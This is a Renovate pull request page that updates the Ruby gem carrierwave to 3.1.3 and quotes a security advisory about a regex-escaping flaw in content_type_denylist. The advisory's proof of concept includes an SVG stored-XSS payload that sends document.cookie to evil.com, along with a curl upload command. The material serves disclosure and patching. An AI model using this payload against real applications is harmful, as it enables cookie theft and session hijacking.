Skip to content

chore(deps): update dependency carrierwave to v3.1.3 [security]#626

Open
renovate[bot] wants to merge 1 commit into
stagingfrom
renovate/rubygems-carrierwave-vulnerability
Open

chore(deps): update dependency carrierwave to v3.1.3 [security]#626
renovate[bot] wants to merge 1 commit into
stagingfrom
renovate/rubygems-carrierwave-vulnerability

Conversation

@renovate

@renovate renovate Bot commented May 27, 2026

Copy link
Copy Markdown
Contributor

This PR contains the following updates:

Package Change Age Confidence
carrierwave (changelog) 3.1.23.1.3 age confidence

CarrierWave has a denylisted_content_type bypass via Unescaped Regex Metacharacters

CVE-2026-44587 / GHSA-7g26-2qgj-chfg

More information

Details

Summary

CarrierWave's content_type_denylist check fails to escape regex metacharacters in string entries, causing the denylist to silently not match the content types it is intended to block.

Note: CarrierWave is aware #content_type_denylist is deprecated for the security reason, but it still used by developers, and the problem here isn't denylist allows any filetype, and thats not a vulnerability in carrierwave, its an implementation problem in developers using CarrierWave, the problem is its denylist entries are interpolated directly into a regex without Regexp.quote or anchoring. The denylist is still useful when developers want to ban specific content types but allow everything else.

Details

In lib/carrierwave/uploader/content_type_denylist.rb:57, string denylist entries are interpolated directly into a regex without Regexp.quote or anchoring:

def denylisted_content_type?(denylist, content_type)
  Array(denylist).any? { |item| content_type =~ /#{item}/ }
end
The entry "image/svg+xml" becomes the regex /image\/svg+xml/ where + is a quantifier meaning "one or more g", not a literal +. This regex never matches the real MIME type "image/svg+xml" which contains a literal +.
This is inconsistent with the allowlist implementation at lib/carrierwave/uploader/content_type_allowlist.rb:53-57, which correctly applies both Regexp.quote and a \A anchor:
rubydef allowlisted_content_type?(allowlist, content_type)
  Array(allowlist).any? do |item|
    item = Regexp.quote(item) if item.class != Regexp
    content_type =~ /\A#{item}/
  end
end

Other affected MIME types include application/xhtml+xml and any type containing regex metacharacters.

Fix: Apply Regexp.quote for string entries and anchor with \A, matching the existing allowlist implementation:

rubydef denylisted_content_type?(denylist, content_type)
  Array(denylist).any? do |item|
    item = Regexp.quote(item) if item.class != Regexp
    content_type =~ /\A#{item}/
  end
end
PoC
 app.rb
require "sinatra"
require "carrierwave"
require "fileutils"

FileUtils.mkdir_p("uploads/files")

CarrierWave.configure do |config|
  config.root      = File.expand_path("uploads")
  config.store_dir = "files"
end

class VaultUploader < CarrierWave::Uploader::Base
  storage :file
  def store_dir = "files"
  def content_type_denylist = %w[image/svg+xml]
end

post "/upload" do
  content_type :json
  san = CarrierWave::SanitizedFile.new(
    tempfile:     params[:file][:tempfile],
    filename:     params[:file][:filename],
    content_type: params[:file][:type]
  )
  uploader = VaultUploader.new
  begin
    uploader.store!(san)
    { result: "VULNERABLE", message: "SVG bypassed denylist", path: uploader.path }.to_json
  rescue CarrierWave::IntegrityError => e
    { result: "blocked", message: e.message }.to_json
  end
end
bundle exec ruby app.rb &

echo '<svg xmlns="http://www.w3.org/2000/svg"><script>document.location="https://evil.com/?c="+document.cookie</script></svg>' > xss.svg

curl -X POST http://localhost:4567/upload \
  -F "file=@&#8203;xss.svg;type=image/svg+xml"

Expected response (denylist working):

json{ "result": "blocked", "message": "..." }

Actual response:

json{ "result": "VULNERABLE", "message": "SVG bypassed denylist", "path": "..." }
Impact

Any application that uses content_type_denylist to block image/svg+xml — the most common use case, specifically to prevent stored XSS — is silently unprotected. An attacker can upload an SVG file containing arbitrary

Severity

  • CVSS Score: 4.7 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

carrierwaveuploader/carrierwave (carrierwave)

v3.1.3

Compare Source

Security

Configuration

📅 Schedule: (in timezone Europe/Amsterdam)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot added the dependencies Pull requests that update a dependency file label May 27, 2026
@codecov

codecov Bot commented May 27, 2026

Copy link
Copy Markdown

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 99.92%. Comparing base (4be1ca2) to head (3c72a58).

Additional details and impacted files
@@           Coverage Diff            @@
##           staging     #626   +/-   ##
========================================
  Coverage    99.92%   99.92%           
========================================
  Files          197      197           
  Lines         2665     2665           
========================================
  Hits          2663     2663           
  Misses           2        2           

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:
  • ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.

@renovate
renovate Bot force-pushed the renovate/rubygems-carrierwave-vulnerability branch from 3c72a58 to 51a9c17 Compare July 16, 2026 21:34
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

dependencies Pull requests that update a dependency file

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants